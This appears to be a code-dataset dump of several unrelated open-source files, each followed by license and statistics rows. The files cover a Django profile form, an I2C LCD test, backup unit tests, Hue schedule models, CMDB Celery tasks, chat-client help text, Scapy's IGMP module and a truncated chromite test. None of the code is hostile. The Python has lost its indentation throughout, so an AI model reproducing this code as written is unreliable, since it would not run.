if redirect_url_info.view_name in views_with_simple_layout:
simple_layout = True
except Http404:
pass
return show_student_profile_form(request, course, simple_layout=simple_layout, redirect_to=redirect_to)
@method_decorator(login_required)
@method_decorator(transaction.atomic)
def post(self, request, course_id):
course_key = CourseKey.from_string(course_id)
course = get_course_by_id(course_key)
if not course.credo_additional_profile_fields:
return JsonResponse({}, status=404)
else:
data = request.POST.copy()
to_save_fields = {}
errors = {}
form_fields = StudentProfileField.init_from_course(course)
for field_alias, field in form_fields.iteritems():
passed_field = data.get(field_alias, '')
if not passed_field and field.required:
errors[field_alias] = ''.join([field.title, " field is required"])
else:
to_save_fields[field_alias] = passed_field
if errors:
return JsonResponse(errors, status=400)
else:
to_save_fields_json = json.dumps(to_save_fields, sort_keys=True)
fields_version = additional_profile_fields_hash(course.credo_additional_profile_fields)
profiles = CredoModulesUserProfile.objects.filter(user=request.user, course_id=course_key)
if len(profiles) > 0:
profile = profiles[0]
profile.meta = to_save_fields_json
profile.fields_version = fields_version
profile.save()
else:
profile = CredoModulesUserProfile(user=request.user, course_id=course_key,
meta=to_save_fields_json, fields_version=fields_version)
profile.save()
return JsonResponse({"success": True})
|
agpl-3.0
| 3,038,702,094,937,294,000 | 37.15 | 118 | 0.59846 | false |
cchampet/TuttleOFX
|
doc/plugins/movie/movieGenerator.py
|
1
|
1094
|
from pyTuttle import tuttle
import os
def generate( prefix, number_of_frames ):
"""
Generate a sequence test with number_of_frames frames, burned with the frame index
the sequence will be placed in the documentation directory (DOC_DIR)
and the sequence will named: DOC_DIR/images/prefix#####.png
"""
for i in range( number_of_frames ):
graph = tuttle.Graph()
text = graph.createNode( "tuttle.text", vAlign="center", bold=1, color=[1,1,1,1], format="PAL", textSize=50, text=str(i) )
write = graph.createNode( "tuttle.pngwriter", filename=os.path.join( os.environ["DOC_DIR"], "images", prefix + str(i).zfill(5) + ".png" ) )
graph.connect( [text, write] )
graph.compute( write )
for i in range( number_of_frames ):
graph = tuttle.Graph()
text = graph.createNode( "tuttle.text", vAlign="center", bold=1, color=[1,1,1,1], format="HD", textSize=50, text=str(i) )
write = graph.createNode( "tuttle.pngwriter", filename=os.path.join( os.environ["DOC_DIR"], "images", prefix + "hd_" + str(i).zfill(5) + ".png" ) )
graph.connect( [text, write] )
graph.compute( write )
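# Usage sketch (hypothetical prefix; DOC_DIR must be set in the environment):
# generate("shot_", 25) writes shot_00000.png ... shot_00024.png plus the
# matching shot_hd_*.png frames.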
|
gpl-3.0
| -2,414,864,582,742,854,000 | 41.076923 | 149 | 0.676417 | false |
bobrathbone/piradio
|
test_i2c_lcd.py
|
1
|
1971
|
#!/usr/bin/env python
#
# LCD driver program using the lcd_i2c_class.py
# $Id: test_i2c_lcd.py,v 1.8 2016/12/03 13:44:51 bob Exp $
# Adapted from RpiLcdBackpack from Paul Knox-Kennedy
# at Adafruit Industries
#
# Author : Bob Rathbone
# Site : http://www.bobrathbone.com
#
# License: GNU V3, See https://www.gnu.org/copyleft/gpl.html
#
# Disclaimer: Software is provided as is and absolutly no warranties are implied or given.
# The authors shall not be liable for any loss or damage however caused.
#
import sys
from lcd_i2c_class import lcd_i2c
from lcd_i2c_pcf8574 import lcd_i2c_pcf8574
from time import sleep
def no_interrupt():
return False
if __name__ == '__main__':
i2c_address = 0x00
print "I2C LCD test program"
print "1 = Adafruit I2C backpack"
print "2 = PCF8574 I2C backpack"
response = raw_input("Select type of backpack: ")
if int(response) is 1:
lcd = lcd_i2c()
i2c_address = 0x20
elif int(response) is 2:
lcd = lcd_i2c_pcf8574()
i2c_address = 0x27
else:
print "Invalid selection!"
sys.exit(1)
print "I2C address:", hex(i2c_address)
try:
if int(response) is 2:
lcd.init(address=i2c_address)
else:
lcd.init()
except:
print "Could not initialise LCD, check selection!"
sys.exit(1)
# Set width
width = 16
print "\nSet LCD width"
print "1 = Width 16"
print "2 = Width 20"
response = raw_input("Select LCD width: ")
if int(response) is 2:
width = 20
print "Width", width
print "Starting test"
lcd.setWidth(width)
lcd.backlight(True)
lcd.blink(False)
lcd.cursor(False)
lcd.clear()
lcd.line1("Bob Rathbone")
lcd.line2("Hello World!")
lcd.blink(True)
sleep(3)
lcd.blink(False)
lcd.line3("Line 3 1923456789012")
lcd.line4("!@#$%^&*(_[]\/?<>:?+")
lcd.scroll2("Bob Rathbone ABCDEFGHIJKLMNOPQRSTUVWXYZ", no_interrupt)
sleep(3)
lcd.line1("Finished test!")
lcd.line2("")
lcd.line3("")
lcd.line4("")
sleep(1)
lcd.backlight(False)
sleep(1)
lcd.backlight(True)
print "Test finished"
|
gpl-3.0
| 1,879,905,245,515,275,000 | 21.146067 | 90 | 0.686961 | false |
SciLifeLab/TACA
|
tests/test_backup.py
|
1
|
7917
|
#!/usr/bin/env python
import unittest
import mock
import tempfile
import os
import shutil
from taca.backup import backup
from taca.utils import config as conf
CONFIG = conf.load_yaml_config('data/taca_test_cfg_backup.yaml')
class TestRunVars(unittest.TestCase):
"""Tests for TACA Backup variables class."""
def test_backup_variables(self):
"""Set up backup variables."""
run_variables = backup.run_vars('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(run_variables.name, '190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(run_variables.zip, '190201_A00621_0032_BHHFCFDSXX.tar.gz')
self.assertEqual(run_variables.key, '190201_A00621_0032_BHHFCFDSXX.key')
self.assertEqual(run_variables.key_encrypted, '190201_A00621_0032_BHHFCFDSXX.key.gpg')
self.assertEqual(run_variables.zip_encrypted, '190201_A00621_0032_BHHFCFDSXX.tar.gz.gpg')
class TestBackupUtils(unittest.TestCase):
"""Tests for TACA Backup utils class."""
def test_fetch_config_info(self):
"""Get backup info from config."""
config_info = backup.backup_utils('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(config_info.data_dirs, {'miseq': 'data/nas/miseq.lab'})
self.assertEqual(config_info.archive_dirs, {'hiseq': 'blah', 'miseq': 'data/nas/miseq.lab/nosync'})
self.assertEqual(config_info.keys_path, 'data/nas/run_keys')
self.assertEqual(config_info.gpg_receiver, 'some.user')
self.assertEqual(config_info.mail_recipients, 'some_user@some_email.com')
self.assertEqual(config_info.check_demux, True)
self.assertEqual(config_info.couch_info, {'url': 'url', 'username': 'username', 'password': 'pwd', 'port': 1234, 'xten_db': 'x_flowcells'})
def test_collect_runs(self):
"""Get backup runs from archive directories."""
backup_object = backup.backup_utils()
backup_object.collect_runs(ext='.tar.gz', filter_by_ext=True)
run = backup_object.runs[0].name
self.assertEqual(run, '200201_A00621_0032_BHHFCFDSXY')
def test_collect_runs_specific_run(self):
"""Collect only specific run."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
backup_object.collect_runs()
run = backup_object.runs[0].name
self.assertEqual(run, '200201_A00621_0032_BHHFCFDSXX')
missing_object = backup.backup_utils(run='some/missing/path/run')
with self.assertRaises(SystemExit):
missing_object.collect_runs()
@mock.patch('taca.backup.backup.sp.Popen.communicate')
@mock.patch('taca.backup.backup.misc')
def test_avail_disk_space(self, mock_misc, mock_sp):
"""Check backup disk space."""
backup_object = backup.backup_utils()
mock_sp.return_value = ['Filesystem 512-blocks Used Available Capacity iused ifree %iused Mounted on\n/dev/disk1s1 976490576 100 813074776 15% 1086272 4881366608 0% /System/Volumes/Data', None]
path = 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX'
run = '190201_A00621_0032_BHHFCFDSXX'
with self.assertRaises(SystemExit):
backup_object.avail_disk_space(path, run)
@mock.patch('taca.backup.backup.sp.check_call')
def test_file_in_pdc(self, mock_call):
"""Check if files exist in PDC."""
mock_call.return_value = 'Whatever'
backup_object = backup.backup_utils()
src_file = 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt'
self.assertTrue(backup_object.file_in_pdc(src_file, silent=True))
def test_get_run_type(self):
"""Get run types from flowcell names."""
backup_object = backup.backup_utils()
novaseq_run = backup_object._get_run_type('190201_A00621_0032_BHHFCFDSXX')
self.assertEqual(novaseq_run, 'novaseq')
hiseqx_run = backup_object._get_run_type('190711_ST-E00266_0356_AH2L32CCX2')
self.assertEqual(hiseqx_run, 'hiseqx')
miseq_run = backup_object._get_run_type('200604_M01320_0329_000000000-J668J')
self.assertEqual(miseq_run, 'miseq')
hiseq_run = backup_object._get_run_type('190628_D00415_0465_BH2HVYBCX3')
self.assertEqual(hiseq_run, 'hiseq')
nextseq_run = backup_object._get_run_type('200602_NS500688_0656_AHGCKWBGXF')
self.assertEqual(nextseq_run, 'nextseq')
    def test_call_commands(self):
        """Call external backup command."""
backup_object = backup.backup_utils()
got_output = backup_object._call_commands(cmd1='ls data/nas/miseq.lab', mail_failed=False, return_out=True)
expected_output = (True, b'190201_A00621_0032_BHHFCFDSXX\nnosync\n')
self.assertEqual(got_output, expected_output)
def test_call_commands_double(self):
"""Call external backup command, given two commands."""
backup_object = backup.backup_utils()
tmp_dir = os.path.join(tempfile.mkdtemp(), 'tmp')
tmp_file = os.path.join(tmp_dir, 'output.out')
os.makedirs(tmp_dir)
cmd1 = 'ls data/nas/miseq.lab'
cmd2 = 'ls data/nas/miseq.lab'
got_output = backup_object._call_commands(cmd1, cmd2, out_file=tmp_file, mail_failed=False)
self.assertTrue(os.path.isfile(tmp_file))
shutil.rmtree(tmp_dir)
def test_check_status(self):
"""Check subprocess status."""
backup_object = backup.backup_utils()
cmd = 'ls'
status_pass = 0
err_msg = 'Error'
got_status_pass = backup_object._check_status(cmd, status_pass, err_msg, mail_failed=False)
self.assertTrue(got_status_pass)
status_fail = 1
got_status_fail = backup_object._check_status(cmd, status_fail, err_msg, mail_failed=False)
self.assertFalse(got_status_fail)
@mock.patch('taca.backup.backup.os.remove')
def test_clean_tmp_files(self, mock_remove):
"""Remove file if it exist."""
backup_object = backup.backup_utils()
files = ['data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt', 'data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/missing_file.txt']
backup_object._clean_tmp_files(files)
mock_remove.assert_called_once_with('data/nas/miseq.lab/190201_A00621_0032_BHHFCFDSXX/RTAComplete.txt')
@mock.patch('taca.backup.backup.statusdb', autospec=True)
@mock.patch('taca.backup.backup.logger')
def test_log_pdc_statusdb(self, mock_logger, mock_couch):
"""Update statusdb if transfer was successful."""
backup_object = backup.backup_utils()
run = '190201_A00621_0032_BHHFCFDSXX'
backup_object._log_pdc_statusdb(run)
mock_logger.warn.assert_called_once()
@mock.patch('taca.backup.backup.backup_utils._call_commands', return_value=True)
@mock.patch('taca.backup.backup.shutil')
@mock.patch('taca.backup.backup.backup_utils._clean_tmp_files')
@mock.patch('taca.backup.backup.backup_utils.avail_disk_space')
def test_encrypt_runs(self, mock_space, mock_clean, mock_shutil, mock_command):
"""Encrypt found runs."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
run = 'data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX'
force = True
backup_object.encrypt_runs(run, force)
mock_clean.assert_called_once()
os.remove('data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX.encrypting')
@mock.patch('taca.backup.backup.logger.error')
def test_pdc_put(self, mock_logger):
"""Put runs on PDC."""
backup_object = backup.backup_utils(run='data/nas/miseq.lab/nosync/200201_A00621_0032_BHHFCFDSXX')
run = 'data/nas/miseq.lab/nosync/190201_A00621_0032_BHHFCFDSXX'
backup_object.pdc_put(run)
mock_logger.assert_called_once()
|
mit
| 8,632,255,092,867,096,000 | 48.792453 | 223 | 0.671593 | false |
moonlet/fuli
|
src/fuli_spiders/fuli_spiders/spiders/fulidang.py
|
1
|
1727
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
from scrapy import Request
from scrapy.selector import Selector
from base import BaseSpider
class FuLiDang(BaseSpider):
name = 'fulidang'
ch_name = u'福利档'
start_urls = ['http://www.fulidang.com/page/1']
white_list = set([u'求出处', u'美图集', u'门事件', u'番号档', u'艺人档',
u'Rosi', u'Disi', u'Tuigirl', u'Ru1mm'])
def parse(self, response):
selector = Selector(response=response)
articles = selector.xpath('/html/body/section/div/div[@class="content"]/article')
for item in articles:
try:
title = item.xpath('header/h2/a/text()').extract()[0]
# link URL
url = item.xpath('header/h2/a/@href').extract()[0]
description = item.xpath('span/text()').extract()[0]
description = self._join_text(description)
# image URL
img = item.xpath('div/a/img/@src').extract()[0]
# YYYY-MM-DD
date = item.xpath('p/span[1]/text()').extract()[0]
date = self._parse_date(date)
# label of category
category = item.xpath('header/a/text()').extract()[0]
if category not in self.__class__.white_list:
continue
self.save(title=title, url=url, description=description,
img=img, date=date, category=category)
except IndexError:
continue
url_prefix, cur_page = response.url.rsplit("/", 1)
next_page = url_prefix + "/" + str(int(cur_page) + 1)
yield Request(next_page, self.parse)
|
mit
| 5,604,872,685,534,299,000 | 39.261905 | 89 | 0.532821 | false |
pycook/cmdb
|
cmdb-api/api/tasks/cmdb.py
|
1
|
3045
|
# -*- coding:utf-8 -*-
import json
import time
from flask import current_app
import api.lib.cmdb.ci
from api.extensions import celery
from api.extensions import db
from api.extensions import es
from api.extensions import rd
from api.lib.cmdb.cache import CITypeAttributesCache
from api.lib.cmdb.const import CMDB_QUEUE
from api.lib.cmdb.const import REDIS_PREFIX_CI
from api.lib.cmdb.const import REDIS_PREFIX_CI_RELATION
from api.models.cmdb import CIRelation
@celery.task(name="cmdb.ci_cache", queue=CMDB_QUEUE)
def ci_cache(ci_id):
time.sleep(0.01)
db.session.close()
m = api.lib.cmdb.ci.CIManager()
ci = m.get_ci_by_id_from_db(ci_id, need_children=False, use_master=False)
if current_app.config.get("USE_ES"):
es.create_or_update(ci_id, ci)
else:
rd.create_or_update({ci_id: json.dumps(ci)}, REDIS_PREFIX_CI)
current_app.logger.info("{0} flush..........".format(ci_id))
@celery.task(name="cmdb.ci_delete", queue=CMDB_QUEUE)
def ci_delete(ci_id):
current_app.logger.info(ci_id)
if current_app.config.get("USE_ES"):
es.delete(ci_id)
else:
rd.delete(ci_id, REDIS_PREFIX_CI)
current_app.logger.info("{0} delete..........".format(ci_id))
@celery.task(name="cmdb.ci_relation_cache", queue=CMDB_QUEUE)
def ci_relation_cache(parent_id, child_id):
db.session.close()
children = rd.get([parent_id], REDIS_PREFIX_CI_RELATION)[0]
children = json.loads(children) if children is not None else {}
cr = CIRelation.get_by(first_ci_id=parent_id, second_ci_id=child_id, first=True, to_dict=False)
if str(child_id) not in children:
children[str(child_id)] = cr.second_ci.type_id
rd.create_or_update({parent_id: json.dumps(children)}, REDIS_PREFIX_CI_RELATION)
current_app.logger.info("ADD ci relation cache: {0} -> {1}".format(parent_id, child_id))
@celery.task(name="cmdb.ci_relation_delete", queue=CMDB_QUEUE)
def ci_relation_delete(parent_id, child_id):
children = rd.get([parent_id], REDIS_PREFIX_CI_RELATION)[0]
children = json.loads(children) if children is not None else {}
if str(child_id) in children:
children.pop(str(child_id))
rd.create_or_update({parent_id: json.dumps(children)}, REDIS_PREFIX_CI_RELATION)
current_app.logger.info("DELETE ci relation cache: {0} -> {1}".format(parent_id, child_id))
@celery.task(name="cmdb.ci_type_attribute_order_rebuild", queue=CMDB_QUEUE)
def ci_type_attribute_order_rebuild(type_id):
current_app.logger.info('rebuild attribute order')
db.session.remove()
from api.lib.cmdb.ci_type import CITypeAttributeGroupManager
attrs = CITypeAttributesCache.get(type_id)
id2attr = {attr.attr_id: attr for attr in attrs}
res = CITypeAttributeGroupManager.get_by_type_id(type_id, True)
order = 0
for group in res:
for _attr in group.get('attributes'):
            if id2attr.get(_attr['id']) and id2attr.get(_attr['id']).order != order:
id2attr.get(_attr['id']).update(order=order)
order += 1
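# Hedged usage sketch (not in the original module): these tasks are meant to
# be enqueued from the API layer with stock Celery calls, e.g.
#     ci_cache.delay(ci_id)
#     ci_relation_cache.apply_async(args=(parent_id, child_id), queue=CMDB_QUEUE)
# .delay() and .apply_async() are standard Celery APIs; the exact call sites
# are an assumption, since they are not shown in this file.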
|
gpl-2.0
| -6,562,198,830,761,991,000 | 31.393617 | 99 | 0.681117 | false |
TntMatthew/dcli
|
commandhelp.py
|
1
|
6437
|
from colors import ansicolors, colorize
import themes
theme = themes.get_default_theme()
def get_command_help(command):
if command == 'help':
return colorize('/help [command]:\n', ansi=theme['command-header']) + \
               colorize('Shows help about a given command. If [command] is omitted, a list' + \
                        ' of available commands is shown instead.', ansi=theme['command-output'])
elif command == 'quit':
return colorize('/quit:\n', ansi=theme['command-header']) + \
colorize('Quits the client. Nothing else to say here.', ansi=theme['command-output'])
elif command == 'shrug':
return colorize('/shrug [message]:\n', ansi=theme['command-header']) + \
               colorize('Sends a message with ¯\\_(ツ)_/¯ appended.', ansi=theme['command-output'])
elif command == 'tableflip':
return colorize('/tableflip [message]:\n', ansi=theme['command-header']) + \
colorize('Sends a message with (╯°□°)╯︵ ┻━┻ appended.', ansi=theme['command-output'])
elif command == 'unflip':
return colorize('/unflip [message]:\n', ansi=theme['command-header']) + \
               colorize('Sends a message with ┬─┬ ノ( ゜-゜ノ) appended.', ansi=theme['command-output'])
elif command == 'away':
return colorize('/away [message]:\n', ansi=theme['command-header']) + \
colorize('Sets your status to idle and tells Discord that you\'re going AFK. ' +
'The benefits of using this over /status idle is that this will allow you ' +
'to receive push notifications on your phone while you\'re away.\n' +
'You can set an optional message that will appear in your now playing text ' +
'prefixed by "[away]". Using this command again without specifying a message ' +
'will un-away you and restore your previous status.',
ansi=theme['command-output'])
elif command == 'status':
return colorize('/status [online|idle|dnd|invisible] [game]:\n', ansi=theme['command-header']) + \
colorize('Sets your status and current game. This will automatically de-away you.',
ansi=theme['command-output'])
elif command == 'replace':
        return colorize('/replace [find-term] [replace-term]:\n',
                        ansi=theme['command-header']) + \
               colorize('Edits the last message you sent by running a find and replace operation.',
                        ansi=theme['command-output'])
elif command == 'delete':
return colorize('/delete [last|user [name]]:\n', ansi=theme['command-header']) + \
colorize('Deletes a message with the given target.\n' +
'\nlast: Deletes the last message sent in the channel.\n' +
'user [name]: Deletes the last message sent in the channel by the given user.\n' +
'\nIf no target is provided, the last message you sent is deleted.',
ansi=theme['command-output'])
elif command == 'pin':
return colorize('/pin [last|mention|user [name]]:\n', ansi=theme['command-header']) + \
colorize('Pins a message with the given target.\n' +
'\nlast: Pins the last message sent in the channel.\n' +
'mention: Pins the last message that mentioned you.\n' +
'user [name]: Pins the last message sent in the channel by the given user.\n' +
'\nIf no target is provided, the last message you sent is pinned.',
ansi=theme['command-output'])
elif command == 'whois':
return colorize('/whois [name]:\n', ansi=theme['command-header']) + \
colorize('Shows the status, user ID, avatar URL, account creation and server join dates, ' +
'and if applicable, roles and nicknames of a member. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'sinfo':
return colorize('/sinfo:\n', ansi=theme['command-header']) + \
colorize('Shows the server ID, region, icon URL (if applicable), creation date, ' +
'owner, and member count for the current server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'nick':
return colorize('/nick [name]:\n', ansi=theme['command-header']) + \
colorize('Sets your server specific nickname. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'msg':
        return colorize('/msg [name]:\n', ansi=theme['command-header']) + \
               colorize('Creates a private channel to talk to the given user privately.\n' +
                        'If a private channel for this user is already open, you are switched to ' +
                        'that channel instead. Cannot be used in DMs.', ansi=theme['command-output'])
elif command == 'kick':
return colorize('/kick [name]:\n', ansi=theme['command-header']) + \
colorize('Kicks the given user from the server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'ban':
return colorize('/ban [delete-message-days] [name]:\n', ansi=theme['command-header']) + \
colorize('Bans the given user from the server. [delete-message-days] is an integer from ' +
'0 to 7 that specifies how many days back this user\'s messages are deleted. ' +
'Cannot be used in DMs.', ansi=theme['command-output'])
elif command == 'unban':
return colorize('/unban [name]:\n', ansi=theme['command-header']) + \
colorize('Unbans the given user from the server. Cannot be used in DMs.',
ansi=theme['command-output'])
elif command == 'set':
return colorize('/set [key] [value(s)]:\n', ansi=theme['command-header']) + \
colorize('Sets a configuration value for the client.', ansi=theme['command-output'])
elif command == 'names':
return colorize('/names:\n', ansi=theme['command-header']) + \
colorize('Lists the users who can access the current channel.', ansi=theme['command-output'])
else:
return '* Unknown command. Send /help for a list of available commands.'
|
mit
| -835,253,984,065,784,300 | 66.336842 | 106 | 0.588557 | false |
adamcharnock/python-hue-client
|
hueclient/models/schedules.py
|
1
|
1513
|
from repose.managers import Manager
from repose.resources import Resource
from hueclient import fields
from booby import validators as v
from hueclient.decoders import IndexedByIdDecoder
from hueclient.monitor import MonitorMixin
class ScheduleManager(Manager):
def get_decoders(self):
return self.decoders + [IndexedByIdDecoder()]
class Command(MonitorMixin, Resource):
#: The address to call (without protocol or domain). Eg:
#: ``/api/<username>/groups/0/action``
address = fields.String(v.Required())
#: The body of the request
body = fields.Dictionary()
#: The HTTP request method
method = fields.String(v.In(['GET', 'PUT', 'POST', 'DELETE']))
class Schedule(MonitorMixin, Resource):
#: The name of the schedule.
name = fields.String(v.Required())
#: Description of the schedule
description = fields.String()
#: Command to execute when the scheduled event occurs
command = fields.Embedded(Command)
#: Local time when the scheduled event will occur
local_time = fields.TimePattern(name='localtime')
#: Status, either 'enabled' or 'disabled'
status = fields.String(v.In(['enabled', 'disabled']))
#: If set to true, the schedule will be removed automatically if expired,
#: if set to false it will be disabled. Default is true.
auto_delete = fields.Boolean(name='autodelete')
#: UTC time that the timer was started. Only provided for timers.
start_time = fields.IsoDate(name='starttime', read_only=True)
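# Hedged usage sketch (not part of the original module): constructing the
# resources with booby-style keyword arguments. The field names come from the
# class definitions above; the keyword constructor and any client/session
# wiring in hueclient are assumptions.
if __name__ == '__main__':
    wake_command = Command(
        address='/api/<username>/groups/0/action',  # address format per the field docs
        method='PUT',
        body={'on': True},
    )
    wake_schedule = Schedule(
        name='Wake up',
        description='Turn the hallway lights on',
        command=wake_command,
        status='enabled',
    )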
|
mit
| -3,247,702,893,598,160,400 | 36.825 | 77 | 0.709187 | false |
CodeNameGhost/shiva
|
thirdparty/scapy/contrib/igmp.py
|
1
|
6990
|
#! /usr/bin/env python
# This file is part of Scapy
# Scapy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# any later version.
#
# Scapy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Scapy. If not, see <http://www.gnu.org/licenses/>.
# scapy.contrib.description = IGMP/IGMPv2
# scapy.contrib.status = loads
# TODO: scapy 2 has function getmacbyip, maybe it can replace igmpize
# at least from the MAC layer
from __future__ import print_function
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import *
#--------------------------------------------------------------------------
def isValidMCAddr(ip):
"""convert dotted quad string to long and check the first octet"""
FirstOct=atol(ip)>>24 & 0xFF
return (FirstOct >= 224) and (FirstOct <= 239)
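# Hedged worked example: atol('224.0.0.1') >> 24 & 0xFF is 224, inside the
# 224-239 multicast range, so isValidMCAddr('224.0.0.1') is True; for
# '192.168.1.1' the first octet is 192, so the result is False.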
#--------------------------------------------------------------------------
class IGMP(Packet):
"""IGMP Message Class for v1 and v2.
This class is derived from class Packet. You need to "igmpize"
the IP and Ethernet layers before a full packet is sent.
a=Ether(src="00:01:02:03:04:05")
b=IP(src="1.2.3.4")
c=IGMP(type=0x12, gaddr="224.2.3.4")
c.igmpize(b, a)
print "Joining IP " + c.gaddr + " MAC " + a.dst
sendp(a/b/c, iface="en0")
Parameters:
type IGMP type field, 0x11, 0x12, 0x16 or 0x17
mrtime Maximum Response time (zero for v1)
gaddr Multicast Group Address 224.x.x.x/4
See RFC2236, Section 2. Introduction for definitions of proper
IGMPv2 message format http://www.faqs.org/rfcs/rfc2236.html
"""
name = "IGMP"
igmptypes = { 0x11 : "Group Membership Query",
0x12 : "Version 1 - Membership Report",
0x16 : "Version 2 - Membership Report",
0x17 : "Leave Group"}
fields_desc = [ ByteEnumField("type", 0x11, igmptypes),
ByteField("mrtime",20),
XShortField("chksum", None),
IPField("gaddr", "0.0.0.0")]
#--------------------------------------------------------------------------
def post_build(self, p, pay):
"""Called implicitly before a packet is sent to compute and place IGMP checksum.
Parameters:
self The instantiation of an IGMP class
p The IGMP message in hex in network byte order
pay Additional payload for the IGMP message
"""
p += pay
if self.chksum is None:
ck = checksum(p)
p = p[:2]+chr(ck>>8)+chr(ck&0xff)+p[4:]
return p
#--------------------------------------------------------------------------
def mysummary(self):
"""Display a summary of the IGMP object."""
if isinstance(self.underlayer, IP):
return self.underlayer.sprintf("IGMP: %IP.src% > %IP.dst% %IGMP.type% %IGMP.gaddr%")
else:
return self.sprintf("IGMP %IGMP.type% %IGMP.gaddr%")
#--------------------------------------------------------------------------
def igmpize(self, ip=None, ether=None):
"""Called to explicitly fixup associated IP and Ethernet headers
Parameters:
self The instantiation of an IGMP class.
ip The instantiation of the associated IP class.
ether The instantiation of the associated Ethernet.
Returns:
        True    The tuple ether/ip/self passed all checks and represents
                a proper IGMP packet.
        False   One or more validation checks failed and no fields
                were adjusted.
The function will examine the IGMP message to assure proper format.
Corrections will be attempted if possible. The IP header is then properly
adjusted to ensure correct formatting and assignment. The Ethernet header
is then adjusted to the proper IGMP packet format.
"""
# The rules are:
# 1. the Max Response time is meaningful only in Membership Queries and should be zero
# otherwise (RFC 2236, section 2.2)
if (self.type != 0x11): #rule 1
self.mrtime = 0
if (self.adjust_ip(ip) == True):
if (self.adjust_ether(ip, ether) == True): return True
return False
#--------------------------------------------------------------------------
def adjust_ether (self, ip=None, ether=None):
"""Called to explicitly fixup an associated Ethernet header
The function adjusts the ethernet header destination MAC address based on
the destination IP address.
"""
# The rules are:
        # 1. send to the group mac address corresponding to the IP.dst
if ip != None and ip.haslayer(IP) and ether != None and ether.haslayer(Ether):
iplong = atol(ip.dst)
ether.dst = "01:00:5e:%02x:%02x:%02x" % ( (iplong>>16)&0x7F, (iplong>>8)&0xFF, (iplong)&0xFF )
# print "igmpize ip " + ip.dst + " as mac " + ether.dst
return True
else:
return False
#--------------------------------------------------------------------------
def adjust_ip (self, ip=None):
"""Called to explicitly fixup an associated IP header
The function adjusts the IP header based on conformance rules
and the group address encoded in the IGMP message.
The rules are:
1. Send General Group Query to 224.0.0.1 (all systems)
2. Send Leave Group to 224.0.0.2 (all routers)
3a.Otherwise send the packet to the group address
3b.Send reports/joins to the group address
4. ttl = 1 (RFC 2236, section 2)
5. send the packet with the router alert IP option (RFC 2236, section 2)
"""
if ip != None and ip.haslayer(IP):
if (self.type == 0x11):
if (self.gaddr == "0.0.0.0"):
ip.dst = "224.0.0.1" # IP rule 1
retCode = True
elif isValidMCAddr(self.gaddr):
ip.dst = self.gaddr # IP rule 3a
retCode = True
else:
print("Warning: Using invalid Group Address")
retCode = False
elif ((self.type == 0x17) and isValidMCAddr(self.gaddr)):
ip.dst = "224.0.0.2" # IP rule 2
retCode = True
elif ((self.type == 0x12) or (self.type == 0x16)) and (isValidMCAddr(self.gaddr)):
ip.dst = self.gaddr # IP rule 3b
retCode = True
else:
print("Warning: Using invalid IGMP Type")
retCode = False
else:
print("Warning: No IGMP Group Address set")
retCode = False
if retCode == True:
ip.ttl=1 # IP Rule 4
ip.options=[IPOption_Router_Alert()] # IP rule 5
return retCode
bind_layers( IP, IGMP, frag=0, proto=2)
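# Hedged end-to-end example, mirroring the usage sketched in the IGMP class
# docstring above (left commented out because sendp() emits real traffic):
# a = Ether(src="00:01:02:03:04:05")
# b = IP(src="1.2.3.4")
# c = IGMP(type=0x16, gaddr="224.2.3.4")   # Version 2 - Membership Report
# c.igmpize(b, a)   # fixes up IP dst/ttl/options and the Ethernet dst MAC
# sendp(a / b / c, iface="en0")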
|
mit
| 1,799,519,684,913,267,700 | 36.180851 | 100 | 0.580973 | false |
endlessm/chromium-browser
|
third_party/chromite/lib/toolchain_util_unittest.py
|
1
|
87756
|
# -*- coding: utf-8 -*-
# Copyright 2019 The Chromium OS Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unit tests for toolchain_util."""
from __future__ import print_function
import base64
import collections
import datetime
import glob
import io
import json
import os
import re
import shutil
import sys
import time
import mock
from six.moves import builtins
from chromite.lib import chroot_lib
from chromite.lib import constants
from chromite.lib import cros_build_lib
from chromite.lib import cros_test_lib
from chromite.lib import git
from chromite.lib import gob_util
from chromite.lib import gs
from chromite.lib import gs_unittest
from chromite.lib import osutils
from chromite.lib import partial_mock
from chromite.lib import portage_util
from chromite.lib import timeout_util
from chromite.lib import toolchain_util
# pylint: disable=protected-access
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
_input_artifact = collections.namedtuple('_input_artifact',
['name', 'gs_locations'])
class ProfilesNameHelperTest(cros_test_lib.MockTempDirTestCase):
"""Test the helper functions related to naming."""
# pylint: disable=protected-access
def testParseBenchmarkProfileName(self):
"""Test top-level function _ParseBenchmarkProfileName."""
# Test parse failure
profile_name_to_fail = 'this_is_an_invalid_name'
with self.assertRaises(toolchain_util.ProfilesNameHelperError) as context:
toolchain_util._ParseBenchmarkProfileName(profile_name_to_fail)
self.assertIn('Unparseable benchmark profile name:', str(context.exception))
# Test parse success
profile_name = 'chromeos-chrome-amd64-77.0.3849.0_rc-r1.afdo'
result = toolchain_util._ParseBenchmarkProfileName(profile_name)
self.assertEqual(
result,
toolchain_util.BenchmarkProfileVersion(
major=77, minor=0, build=3849, patch=0, revision=1,
is_merged=False))
